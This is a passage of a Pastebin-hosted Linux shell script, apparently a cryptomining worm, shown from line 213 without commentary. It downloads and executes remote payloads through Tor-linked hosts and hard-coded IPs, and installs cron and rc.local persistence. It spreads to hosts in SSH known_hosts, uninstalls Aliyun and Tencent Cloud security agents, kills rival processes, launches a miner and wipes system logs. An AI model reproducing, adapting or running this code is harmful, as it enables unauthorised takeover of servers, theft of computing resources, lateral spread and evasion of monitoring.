  213.     (${sudo} ${curl} ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LBIN4}||${sudo} ${curl} ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LBIN4}||${sudo} ${curl} ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LBIN4}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LBIN4}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LBIN4}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LBIN4}) && ${sudo} chmod 755 ${LBIN4}
  214.     ${sudo} mkdir -p /etc/cron.daily
  215.     (${sudo} ${curl} ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LBIN5}||${sudo} ${curl} ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LBIN5}||${sudo} ${curl} ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LBIN5}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LBIN5}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LBIN5}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LBIN5}) && ${sudo} chmod 755 ${LBIN5}
  216.     ${sudo} mkdir -p /etc/cron.monthly
  217.     (${sudo} ${curl} ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LBIN6}||${sudo} ${curl} ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LBIN6}||${sudo} ${curl} ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LBIN6}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LBIN6}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LBIN6}||${sudo} ${wget} ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LBIN6}) && ${sudo} chmod 755 ${LBIN6}
  218.     if [ -f ${sshdir}/known_hosts ] && [ -f ${sshdir}/id_rsa.pub ]; then
  219.           for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" ${sshdir}/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '${C3}|sh' & done
  220.     fi
  221.     ${sudo} touch -acmr /bin/sh /etc/cron.hourly/cronlog
  222.     ${sudo} touch -acmr /bin/sh /etc/cron.daily/cronlog
  223.     ${sudo} touch -acmr /bin/sh /etc/cron.monthly/cronlog
  224.     [[ ! $(${sudo} cat /etc/rc.local | grep "^sh ${LBIN7}") == "sh ${LBIN7}" ]] && { ${sudo} chattr -i -a /etc/rc.local >/dev/null 2>&1; ${sudo} chmod 755 /etc/rc.local >/dev/null 2>&1; ${sudo} sed -i '/^exit 0$/d' /etc/rc.local >/dev/null 2>&1; ${sudo} echo -e "sh ${LBIN7}" >> /etc/rc.local; ${sudo} echo -e "exit 0" >> /etc/rc.local; }
  225. }
  226.  
  227. function a() {
  228.     touch "${LPATH}.a"
  229.     ${sudo} pkill barad_agent*; ${sudo} pkill anat*;
  230.     if ${sudo} ps aux|grep -v defunct|grep -i '[a]liyun'; then
  231.         ${wget} http://update.aegis.aliyun.com/download/uninstall.sh
  232.         chmod +x uninstall.sh
  233.         ${sudo} ./uninstall.sh
  234.         ${wget} http://update.aegis.aliyun.com/download/quartz_uninstall.sh
  235.         chmod +x quartz_uninstall.sh
  236.         ${sudo} ./quartz_uninstall.sh
  237.         rm -f uninstall.sh     quartz_uninstall.sh 2>/dev/null
  238.         ${sudo} pkill aliyun-service 2>/dev/null
  239.         ${sudo} rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service 2>/dev/null
  240.         ${sudo} rm -rf /usr/local/aegis* 2>/dev/null;
  241.     elif ${sudo} ps aux|grep -v defunct|grep -i '[y]unjing'; then
  242.         ${sudo} /usr/local/qcloud/stargate/admin/uninstall.sh
  243.         ${sudo} /usr/local/qcloud/YunJing/uninst.sh
  244.         ${sudo} /usr/local/qcloud/monitor/barad/admin/uninstall.sh
  245.     fi
  246. }
  247. function f() {
  248.     NTOK=$(netstat --version 2>/dev/null|wc -l)
  249.     if [ ${NTOK} -eq 0 ]; then NETTOOL='ss '; else NETTOOL='netstat '; fi
  250.     port=$(${sudo} ${NETTOOL} -an 2>/dev/null| grep :3333 | wc -l)
  251.     self=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep "${grepmn}"|wc -l)
  252.     if [ ${self} -gt 1 ]; then
  253.         ${sudo} ps ax|grep -v grep|grep -v defunct|grep "${grepmn}"|awk 'NR >= 2'| while read pid _; do ${sudo} kill -9 "$pid" >/dev/null 2>&1; done
  254.     fi
  255.     port=$(${sudo} ${NETTOOL} -an 2>&1| grep :3333 | wc -l)
  256.     self=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep "${grepmn}"|wc -l)
  257.     if [[ ${self} -eq 0 ]] || [[ ${port} -eq 0 ]];then
  258.         if [ ! -f ${LPATH}${LBIN3} ] && [ -f ${LPATH}${LBIN2} ]; then
  259.             unzip -qjoP no-password ${LPATH}${LBIN2} >/dev/null 2>&1; sleep 3
  260.             mv ${RBIN} ${LPATH}${LBIN3}
  261.             chmod +x ${LPATH}${LBIN3}
  262.             ${sudo} chattr +i ${LPATH}${LBIN3} >/dev/null 2>&1
  263.  
  264.         fi
  265.         if [[ -f ${LPATH}${LBIN3} ]]; then
  266.             ${sudo} chattr -i /usr/bin/[${grepmn}] >/dev/null 2>&1
  267.             if [[ ${sudoer} == 1 ]]; then
  268.                 echo always | ${sudo} tee /sys/kernel/mm/transparent_hugepage/enabled >/dev/null 2>&1
  269.                 ${sudo} sysctl -w vm.nr_hugepages=128 >/dev/null 2>&1
  270.                 ${sudo} rm -f /usr/bin/[${grepmn}] >/dev/null 2>&1; ${sudo} cp ${LPATH}${LBIN3} /usr/bin/[${grepmn}] >/dev/null 2>&1; ${sudo} chmod +x /usr/bin/[${grepmn}] >/dev/null 2>&1
  271.                 ${sudo} nohup "[${grepmn}]" -c ${LPATH}wc.conf >/dev/null 2>&1 &
  272.             else
  273.                 ${sudo} rm -f ${LPATH}.${LBIN8} >/dev/null 2>&1; ${sudo} cp ${LPATH}${LBIN3} ${LPATH}.${LBIN8} >/dev/null 2>&1; ${sudo} chmod +x ${LPATH}.${LBIN8} >/dev/null 2>&1
  274.                 ${sudo} nohup ${LPATH}.${LBIN8} -c ${LPATH}wc.conf >/dev/null 2>&1 &
  275.             fi
  276.         fi
  277.     fi
  278.     if [ ${SCN} -gt 0 ]; then
  279.         port2=$(${sudo} ${NETTOOL} -an 2>/dev/null| grep :6379 | wc -l)
  280.         pysc=$(${sudo} ps aux 2>/dev/null|grep -v grep|grep -v defunct|grep -F " -c import base64;exec(base64.b64decode("|wc -l)
  281.         if [[ ! -f "${LPATH}.aYn0N29e2MItcV7Di2udY4Idnd0zOC6qsDf" ]] || [[ ${port} -eq 0 ]] || [[ ${port2} -eq 0 ]] || [[ ${pysc} -gt 1 ]]; then
  282.             rm -rf "${LPATH}.aYn0N29e2MItcV7Di2udY4Idnd0zOC6qsDf"
  283.             ${sudo} netstat -tanp 2>/dev/null|grep -v ctive|grep -v -|awk '/:8161 */ {split($NF,i1,"/"); print i1[1]}'|uniq|while read pid _; do ${sudo} kill -9 "$pid" >/dev/null 2>&1; done
  284.             ${sudo} netstat -tanp 2>/dev/null|grep -v redis|grep -v -|awk '/:6379 */ {split($NF,i2,"/"); print i2[1]}'|uniq|while read pid _; do ${sudo} kill -9 "$pid" >/dev/null 2>&1; done
  285.             #${sudo} killall -9 python >/dev/null 2>&1; ${sudo} killall -9 python2 >/dev/null 2>&1
  286.             [ ${pysc} -gt 1 ] && { ${sudo} ps aux 2>/dev/null|grep -v grep|grep -v defunct|grep -F " -c import base64;exec(base64.b64decode("|uniq|awk '{print $2}'|while read pid _; do ${sudo} kill -9 "$pid" >/dev/null 2>&1; done; }
  287.             e 2>/dev/null
  288.         fi
  289.     fi
  290. }
  291. function g() {
  292.     if [ $(${sudo} ps aux|grep -v 'grep'|grep -v defunct|grep ' sleep 30'|wc -l) -gt 2 ]; then
  293.         ${sudo} ps -eo ppid,cmd|grep -v grep|grep -v defunct|grep -v 'sh '|grep -i 'sleep 30'|awk 'NR >= 3'|awk '{print $1}'|while read pid _; do [ ${pid} -gt 301 ] && [ ${pid} -ne "$$" ] && (${sudo} kill -9 "$pid" >/dev/null 2>&1;); done
  294.         ${sudo} ps aux|grep -v grep|grep -v defunct|grep -v 'sh '|grep ' sleep 30'|awk 'NR >= 3'|awk '{print $2}'| while read pid _; do ${sudo} kill -9 "$pid" >/dev/null 2>&1; done
  295.     fi
  296. }
  297. sudoer=1
  298. sudo=''
  299. grepmn="${LBIN8}"
  300. if [ "$(whoami)" != "root" ]; then
  301.     sudo="sudo "
  302.     #timeout 1 sudo -v >/dev/null 2>&1 && sudoer=1||{ sudo=''; sudoer=0; grepmn=".${LBIN8}"; }
  303.     timeout 1 sudo echo 'kthreadd' 2>/dev/null && sudoer=1||{ sudo=''; sudoer=0; grepmn=".${LBIN8}"; }
  304. fi
  305. rand=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c $(shuf -i 4-16 -n 1) ; echo ''); if [ -z ${rand} ]; then rand='.tmp'; fi
  306. echo "${rand}" > "$(pwd)/.${rand}" 2>/dev/null && LPATH="$(pwd)/.cache/"; rm -f "$(pwd)/.${rand}" >/dev/null 2>&1
  307. echo "${rand}" > "/tmp/.${rand}" 2>/dev/null && LPATH="/tmp/.cache/"; rm -f "/tmp/.${rand}" >/dev/null 2>&1
  308. echo "${rand}" > "/usr/local/bin/.${rand}" 2>/dev/null && LPATH="/usr/local/bin/.cache/"; rm -f "/usr/local/bin/.${rand}" >/dev/null 2>&1
  309. echo "${rand}" > "${HOME}/.${rand}" 2>/dev/null && LPATH="${HOME}/.cache/"; rm -f "${HOME}/.${rand}" >/dev/null 2>&1
  310. mkdir -p ${LPATH} >/dev/null 2>&1
  311. ${sudo} chattr -i ${LPATH} >/dev/null 2>&1; chmod 1755 ${LPATH} >/dev/null 2>&1
  312. if [ "$(whoami)" != "root" ]; then sshdir="${HOME}/.ssh"; else sshdir='/root/.ssh'; fi
  313. C1="*/4 * * * * ${CHKCURL} ("'${curl}'" ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LPATH}.ntp) && chmod +x ${LPATH}.ntp && $(command -v sh) ${LPATH}.ntp"
  314. C2="*/8 * * * * root ${CHKCURL} ("'${curl}'" ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LPATH}.ntp) && chmod +x ${LPATH}.ntp && $(command -v sh) ${LPATH}.ntp"
  315. C3="${CHKCURL} ("'${curl}'" ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LBIN7}||"'${curl}'" ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LBIN7}||"'${curl}'" ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LBIN7}||"'${wget}'" ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LBIN7}||"'${wget}'" ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LBIN7}||"'${wget}'" ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LBIN7})"
  316. if [ -f /usr/bin/yum ]; then
  317.     INSTALLER="yum reinstall -y -q -e 0 "
  318. elif [ -f /usr/bin/apt-get ]; then
  319.     INSTALLER="DEBIAN_FRONTEND=noninteractive ${sudo} apt-get --yes --force-yes install --reinstall "
  320. elif [ -f /usr/bin/pacman ]; then
  321.     INSTALLER="pacman -S --noconfirm "
  322. elif [ -f /sbin/apk ]; then
  323.     INSTALLER="apk --no-cache -f add "
  324. fi
  325. NTOK=$(netstat --version 2>/dev/null|wc -l)
  326. if [ ${NTOK} -eq 0 ]; then NETTOOL='ss '; ${sudo} ${INSTALLER} net-tools >/dev/null 2>&1; else NETTOOL='netstat '; fi
  327.  
  328. if [ ! -f "${LPATH}.a" ]; then
  329.     a >/dev/null 2>&1 &
  330. fi
  331. UD=$(${curl} ${COPTS} ${RHOST}${TOR1}src/ud||${curl} ${COPTS} ${RHOST}${TOR2}src/ud||${curl} ${COPTS} ${RHOST}${TOR3}src/ud||${wget} ${WOPTS} ${RHOST}${TOR1}src/ud||${wget} ${WOPTS} ${RHOST}${TOR2}src/ud||${wget} ${WOPTS} ${RHOST}${TOR3}src/ud)
  332. rm -f ./ud ./ud.* >/dev/null 2>&1
  333. wdog0=$(ps aux|grep -v 'grep'|grep -v defunct|grep -v 'sh '|grep ' sleep 30'|wc -l)
  334. if [ ${UD:-0} -gt 0 ] && [ ${wdog0} -gt 0 ]; then
  335.     if [ ${UD:-0} -gt 2 ]; then ${sudo} ps ax|grep -v grep|grep -vi defunct|grep "${grepmn}"|while read pid _; do [ ${pid} -gt 301 ] && (${sudo} kill -9 "$pid" >/dev/null 2>&1;); done; fi
  336.     ${sudo} ps -eo ppid,cmd|grep -v grep|grep -v defunct|grep -v 'sh '|grep -i 'sleep 30'|awk '{print $1}'|while read pid _; do [ ${pid} -gt 301 ] && (${sudo} kill -9 "$pid" >/dev/null 2>&1;); done
  337.     ${sudo} ps aux|grep -v 'grep'|grep -v defunct|grep -v 'sh '|grep ' sleep 30'|awk '{print $2}'|while read pid _; do [ ${pid} -gt 301 ] && (${sudo} kill -9 "$pid" >/dev/null 2>&1;); done
  338.     (${curl} ${COPTS} ${RHOST}${TOR1}src/main||${curl} ${COPTS} ${RHOST}${TOR2}src/main||${curl} ${COPTS} ${RHOST}${TOR3}src/main||${wget} ${WOPTS} ${RHOST}${TOR1}src/main||${wget} ${WOPTS} ${RHOST}${TOR2}src/main||${wget} ${WOPTS} ${RHOST}${TOR3}src/main)|base64 -d |${sudo} $(command -v bash) &
  339.     exit 0
  340. fi
  341. self=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep "${grepmn}"|wc -l)
  342. if [ ${self} -gt 1 ]; then
  343.     ${sudo} ps ax|grep -v grep|grep -v defunct|grep "${grepmn}"|awk 'NR >= 2'| while read pid _; do ${sudo} kill -9 "$pid" >/dev/null 2>&1; done
  344. fi
  345. selfp=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep "${grepmn}"|head -n 1|awk '{if($3<=34.0) print $2}')
  346. t=$(shuf -i 1-99 -n 1)
  347. if [ ${selfp:-0} -gt 301 ] && [ $t -lt 21 ]; then
  348.     ${sudo} ps ax|grep -v grep|grep -v defunct|grep "${grepmn}"| while read pid _; do ${sudo} kill -9 "$pid" >/dev/null 2>&1; done
  349. fi
  350. b >/dev/null 2>&1 &
  351. if [[ ${sudoer} == 1 ]]; then
  352.     c >/dev/null 2>&1 &
  353. fi
  354. port=$(${sudo} ${NETTOOL} -an 2>/dev/null| grep :3333 | wc -l)
  355. self=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep "${grepmn}"|wc -l)
  356. selfp=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep "${grepmn}"|head -n 1|awk '{print $3}')
  357. wdog=1
  358. if [[ ${self} -eq 0 ]] || [[ ${port} -eq 0 ]]; then
  359.     wdog=0
  360.     if [[ -f ${LPATH}${LBIN3} ]]; then
  361.         ${sudo} chattr -i /usr/bin/[${grepmn}] >/dev/null 2>&1
  362.         if [[ ${sudoer} == 1 ]]; then
  363.             ${sudo} rm -f /usr/bin/[${grepmn}] >/dev/null 2>&1; ${sudo} cp ${LPATH}${LBIN3} /usr/bin/[${grepmn}] >/dev/null 2>&1; ${sudo} chmod +x /usr/bin/[${grepmn}] >/dev/null 2>&1
  364.             ${sudo} nohup "[${grepmn}]"-c ${LPATH}wc.conf >/dev/null 2>&1 &
  365.         else
  366.             ${sudo} rm -f ${LPATH}.${LBIN8} >/dev/null 2>&1; ${sudo} cp ${LPATH}${LBIN3} ${LPATH}.${LBIN8} >/dev/null 2>&1; ${sudo} chmod +x ${LPATH}.${LBIN8} >/dev/null 2>&1
  367.             ${sudo} nohup ${LPATH}.${LBIN8} -c ${LPATH}wc.conf  >/dev/null 2>&1 &
  368.         fi
  369.     fi
  370.     d
  371. fi
  372. if [ ${SCN} -gt 0 ]; then
  373.     port=$(${sudo} ${NETTOOL} -an 2>/dev/null| grep :3333 | wc -l)
  374.     port2=$(${sudo} ${NETTOOL} -an 2>/dev/null| grep :6379 | wc -l)
  375.     pysc=$(${sudo} ps aux 2>/dev/null|grep -v grep|grep -v defunct|grep -F " -c import base64;exec(base64.b64decode("|wc -l)
  376.     if [[ ${UD} -gt 1 ]] || [[ ! -f "${LPATH}.aYn0N29e2MItcV7Di2udY4Idnd0zOC6qsDf" ]] || [[ ${port} -eq 0 ]] || [[ ${port2} -eq 0 ]] || [[ ${pysc} -gt 1 ]]; then
  377.         rm -rf "${LPATH}.aYn0N29e2MItcV7Di2udY4Idnd0zOC6qsDf"
  378.         ${sudo} netstat -tanp 2>/dev/null|grep -v redis|grep -v -|awk '/:6379 */ {split($NF,i2,"/"); print i2[1]}'|uniq|while read pid _; do ${sudo} kill -9 "$pid" >/dev/null 2>&1; done
  379.         [ ${pysc} -gt 1 ] && { ${sudo} ps aux 2>/dev/null|grep -v grep|grep -v defunct|grep -F " -c import base64;exec(base64.b64decode("|uniq|awk '{print $2}'|while read pid _; do ${sudo} kill -9 "$pid" >/dev/null 2>&1; done; }
  380.         e >/dev/null 2>&1 &
  381.     fi
  382. fi
  383. if [ ${sudoer} == 1 ]; then
  384.     [ -f /var/spool/mail/$USER ] && { ${sudo} echo 0>/var/spool/mail/$USER >/dev/null 2>&1; }
  385.     ${sudo} echo 0>/var/log/wtmp >/dev/null 2>&1
  386.     ${sudo} echo 0>/var/log/secure >/dev/null 2>&1
  387.     ${sudo} echo 0>/var/log/cron >/dev/null 2>&1
  388. fi
  389. g
  390. (${curl} ${COPTS} ${RHOST}${TOR1}src/wd||${curl} ${COPTS} ${RHOST}${TOR2}src/wd||${curl} ${COPTS} ${RHOST}${TOR3}src/wd||${wget} ${WOPTS} ${RHOST}${TOR1}src/wd||${wget} ${WOPTS} ${RHOST}${TOR2}src/wd||${wget} ${WOPTS} ${RHOST}${TOR3}src/wd)|base64 -d |${sudo} $(command -v bash) &
  391. if [ ${UD:-0} -gt 0 ]; then wdog=0; fi
  392. #if [[ ${wdog} -eq 0 ]] || [[ $(${sudo} ps aux|grep -v 'grep'|grep -v defunct|grep ' sleep 30'|wc -l) -eq 0 ]] || [[ $(${sudo} ps aux|grep -v 'grep'|grep -v defunct|grep ' sleep 30'|wc -l) -gt 2 ]]; then
  393. if [[ $(${sudo} ps aux|grep -v 'grep'|grep -v 'sh '|grep -v defunct|grep ' sleep 30'|wc -l) -lt 2 ]]; then
  394.     while true; do
  395.         b >/dev/null 2>&1 &
  396.         f >/dev/null 2>&1 &
  397.         if [ -f /var/spool/mail/$USER ]; then ${sudo} echo 0>/var/spool/mail/$USER >/dev/null 2>&1; fi
  398.         sleep 30
  399.     done &
  400. fi
  401. netstat -ant|grep '185.161.70.34:3333\|154.16.67.133:80\|205.185.122.99:3333'|grep 'ESTABLISHED'|grep -v grep
  402. if [ $? -eq 0 ]
  403. then
  404. pwd
  405. else
  406. wget -O ${LPATH}wc.conf http://154.16.67.136/wc.conf || curl -o ${LPATH}wc.conf http://107.174.47.156/wc.conf
  407. ${sudo} nohup "[${grepmn}]"-c ${LPATH}wc.conf >/dev/null 2>&1 &
  408. fi
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top